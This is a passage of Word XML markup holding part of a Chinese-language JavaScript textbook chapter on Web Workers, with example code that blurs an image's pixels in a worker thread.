    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>常用的事件目标方法：</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可以将它设置为一个错误事件处理程序，就像在</w:t>
      </w:r>
      <w:r>
        <w:t>14.6</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>Window.onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序那样。如果注册了错误处理程序，那么错误的消息、</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>以及行号会作为三个字符串参</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数传递给该处理程序。如果该处理程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则表示错误已经处理，不应该再将其当成一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件传播了。（不过，截至撰写本书时，不是所有的浏览器都实现了在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中的错误处理。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象还包含客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>一些重要的构造函数对象。其中</w:t>
      </w:r>
      <w:r>
        <w:t>包括</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest()</w:t>
      </w:r>
      <w:r>
        <w:t>，以便</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过它进行脚本化的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章），以及</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过它创建它们自己的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程。（然而，截至撰写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>还不支持在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章后续将要介绍的一些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML 5 API</w:t>
      </w:r>
      <w:r>
        <w:t>，在普通的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象上都定义了一些新特性。通常，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象会定义一个异步的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，同时，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlo</w:t>
      </w:r>
      <w:r>
        <w:t>balScope</w:t>
      </w:r>
      <w:r>
        <w:t>会添加一个相同基本</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的异步版本。这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>”API</w:t>
      </w:r>
      <w:r>
        <w:t>会在本章后续部分做相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>高级特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程都是专用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程：它们和单独的父线程相关联。</w:t>
      </w:r>
      <w:r>
        <w:t>Web Workers</w:t>
      </w:r>
      <w:r>
        <w:t>标准还定义了另外一类</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程：共</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>享</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程。截至撰写本书时，浏览器还未实现此类线程。但是这里仍然对其做相应介绍，原因是，共享</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程是一种命名资源，为任何与之相连接的线程提供计算服务，和共享</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>之间的交互就好比是通过网络套接字和服务器进行通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于共享</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程而言，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>套接字</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>又叫</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePorts</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个消息传递</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，和为专用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程和跨文档消息传递统一的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>类似：它们有一个</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准允许通过</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannel()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，创建一对相互连接的</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象。可以将</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePorts</w:t>
      </w:r>
      <w:r>
        <w:t>（作为</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的特殊参数）传递给其他窗口或者其他</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>，并将它们作为专用的通信频道</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePorts</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannels</w:t>
      </w:r>
      <w:r>
        <w:t>是高级</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，目前大多数浏览器都还未实现，因此这里将不做介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="22_4_3_Web_WorkerDe_Li_Zi_"/>
      <w:r>
        <w:t>22.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的例子</w:t>
      </w:r>
      <w:bookmarkEnd w:id="555"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节将以两个</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的例子结束。第一个例子展示了如何在一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中执行长时间计算，同时又不影响主线程进行</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>响应。第二个例子展示了</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程如何使用更加简单的同步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-6</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>smear()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它接受一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素作为参数。该函数用于在图片上产生向右的动态模糊效果。它使用了第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍的技术，将图</w:t>
      </w:r>
      <w:r>
        <w:t>片复制到一个屏幕外的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中，然后再将图片的像素提取到一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中。不能通过</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>，但是可以传递</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象（具体细节参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-6</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将要涂抹的像素传递给它。当</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程将处理完的像素信息再传递回来后，代码将它们复制回＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中，再作为</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</w:t>
      </w:r>
      <w:r>
        <w:t>提取它们，然后将该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:t>置成最初＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-6</w:t>
      </w:r>
      <w:r>
        <w:t>：创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程处理图片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>异步地将图片内容替换成动态模糊版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以这种方式使用：＜</w:t>
      </w:r>
      <w:r>
        <w:t>img src="testimage.jpg"onclick="smear(this)"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function smear(img){//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个和图片尺寸相同的屏幕外＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=document.createElement("canvas");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.width=img.width;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.height=i</w:t>
      </w:r>
      <w:r>
        <w:t>mg.height;//</w:t>
      </w:r>
      <w:r>
        <w:t>将图片复制到画布中，随后提取其像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var context=canvas.getContext("2d");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.drawImage(img,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pixels=context.getImageData(0,0,img.width,img.height)//</w:t>
      </w:r>
      <w:r>
        <w:t>将像素信息传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var worker=new Worker("SmearWorker.js");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>worker.postMessage(pixels);//</w:t>
      </w:r>
      <w:r>
        <w:t>复制和</w:t>
      </w:r>
      <w:r>
        <w:t>传递像素信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序来获取</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>worker.onmessage=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var smeared_pixels=e.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>获取的像素信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>context.putImageData(smeared_pixels,0,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它们复制到画布中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.src=canvas.toDataURL();//</w:t>
      </w:r>
      <w:r>
        <w:t>然后，添加到</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>worker.terminate();//</w:t>
      </w:r>
      <w:r>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.width=canvas.height=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>将周围像素清空</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例</w:t>
      </w:r>
      <w:r>
        <w:t>22-7</w:t>
      </w:r>
      <w:r>
        <w:t>所示的代码是给例</w:t>
      </w:r>
      <w:r>
        <w:t>22-6</w:t>
      </w:r>
      <w:r>
        <w:t>中创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程使用的。该例是一个图片处理函数：基于例</w:t>
      </w:r>
      <w:r>
        <w:t>21-10</w:t>
      </w:r>
      <w:r>
        <w:t>修改的。要注意的是，该例使用一行代码就建立了一套消息传递机制：</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序只将传递给它的图片进行涂抹，随后传递回去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-7</w:t>
      </w:r>
      <w:r>
        <w:t>：在</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中进行图片处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从主线程中获取</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象，对其进行处理并将它传递回去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmessage=function(e){postMess</w:t>
      </w:r>
      <w:r>
        <w:t>age(smear(e.data));}//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>中的像素信息向右涂抹，产生动态模糊效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于大图片，此方法会进行大量的计算，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它用在主线程中的话，很有可能导致无法响应</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>操作的问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function smear(pixels){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=pixels.data,width=pixels.width,height=pixels.height;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=10,m=n-1;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>倍大，用于更多的涂抹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var row=0;row</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>height;row++){//</w:t>
      </w:r>
      <w:r>
        <w:t>每一行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=row*width*4+4;//</w:t>
      </w:r>
      <w:r>
        <w:t>第二个像素偏移</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var col=1;col</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>width;col++,i+=4){//</w:t>
      </w:r>
      <w:r>
        <w:t>每一列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i]=(data[i]+data[i-4]*m)/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>红色像素分量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i+1]=(data[i+1]+data[i-3]*m)/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>绿色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i+2]=(data[i+2]+data[i-2]*m)/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>蓝色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i+3]=(data[i+3]+data[i-1]*m)/n;//Alpha</w:t>
      </w:r>
      <w:r>
        <w:t>分量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>pixels;</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要注意的是，例</w:t>
      </w:r>
      <w:r>
        <w:t>22-7</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码可以用于处理任意数量的图片。然而，为了简单起见，例</w:t>
      </w:r>
      <w:r>
        <w:t>22-6</w:t>
      </w:r>
      <w:r>
        <w:t>为它要处理的每一幅图片创建了一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象。同时，为了确保没有线程闲置，它会对于已经完成操作的线程调用</w:t>
      </w:r>
      <w:r>
        <w:t>terminate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将其终止掉。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>调试</w:t>
      </w:r>
